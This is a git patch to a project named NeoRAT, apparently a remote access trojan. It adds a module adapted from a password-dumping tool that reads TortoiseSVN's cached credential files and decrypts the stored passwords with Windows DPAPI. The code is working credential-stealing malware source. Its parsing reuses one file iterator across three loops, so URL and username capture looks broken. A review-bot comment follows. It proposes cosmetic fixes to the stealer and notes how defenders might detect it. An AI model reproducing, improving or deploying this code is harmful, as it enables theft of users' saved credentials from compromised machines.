From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT
---
.../lazagne/softwares/svn/__init__.py | 0
.../lazagne/softwares/svn/tortoise.py | 68 ++++++++++++++++++++++
2 files changed, 68 insertions(+)
create mode 100644 foreign/client_handling/lazagne/softwares/svn/__init__.py
create mode 100644 foreign/client_handling/lazagne/softwares/svn/tortoise.py
(limited to 'foreign/client_handling/lazagne/softwares/svn')
diff --git a/foreign/client_handling/lazagne/softwares/svn/__init__.py b/foreign/client_handling/lazagne/softwares/svn/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/foreign/client_handling/lazagne/softwares/svn/tortoise.py b/foreign/client_handling/lazagne/softwares/svn/tortoise.py
new file mode 100644
index 0000000..dfa5c4d
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/svn/tortoise.py
@@ -0,0 +1,68 @@
+# -*- coding: utf-8 -*-
+import base64
+
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import Win32CryptUnprotectData
+from foreign.client_handling.lazagne.config.constant import constant
+
+import os
+
+
+class Tortoise(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'tortoise', 'svn', winapi_used=True)
+
+ def run(self):
+ pwd_found = []
+ path = os.path.join(constant.profile["APPDATA"], u'Subversion\\auth\\svn.simple')
+ if os.path.exists(path):
+ for root, dirs, files in os.walk(path + os.sep):
+ for filename in files:
+ f = open(os.path.join(path, filename), 'r')
+ url = ''
+ username = ''
+ result = ''
+
+ i = 0
+ # password
+ for line in f:
+ if i == -1:
+ result = line.replace('\n', '')
+ break
+ if line.startswith('password'):
+ i = -3
+ i += 1
+
+ i = 0
+ # url
+ for line in f:
+ if i == -1:
+ url = line.replace('\n', '')
+ break
+ if line.startswith('svn:realmstring'):
+ i = -3
+ i += 1
+
+ i = 0
+
+ # username
+ for line in f:
+ if i == -1:
+ username = line.replace('\n', '')
+ break
+ if line.startswith('username'):
+ i = -3
+ i += 1
+
+ # encrypted the password
+ if result:
+ try:
+ password = Win32CryptUnprotectData(base64.b64decode(result), is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi)
+ pwd_found.append({
+ 'URL': url,
+ 'Login': username,
+ 'Password': str(password)
+ })
+ except Exception:
+ pass
+ return pwd_found
--
cgit v1.2.3
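Review bot: `Tortoise` and `run` carry no docstring, and the last comment in `run`, `# encrypted the password`, says the opposite of what the code under it does: the stored `password` value is base64-decoded and handed to `Win32CryptUnprotectData`, so it is being decrypted. I would add a class docstring along the lines of `"""Read cached SVN credentials under %APPDATA%\Subversion\auth\svn.simple and unprotect the stored password."""` and reword the comment to `# decrypt the stored password`. The `except Exception: pass` around that call also deserves a comment stating that failures are dropped on purpose, since an empty result is otherwise indistinguishable from an error. For anyone reading this commit defensively, the documented behaviour is the detection surface: a process that is not an SVN client walking `Subversion\auth\svn.simple` and unprotecting its contents in the user's context (presumably DPAPI, given the `user_dpapi` argument), which the cache does not guard against.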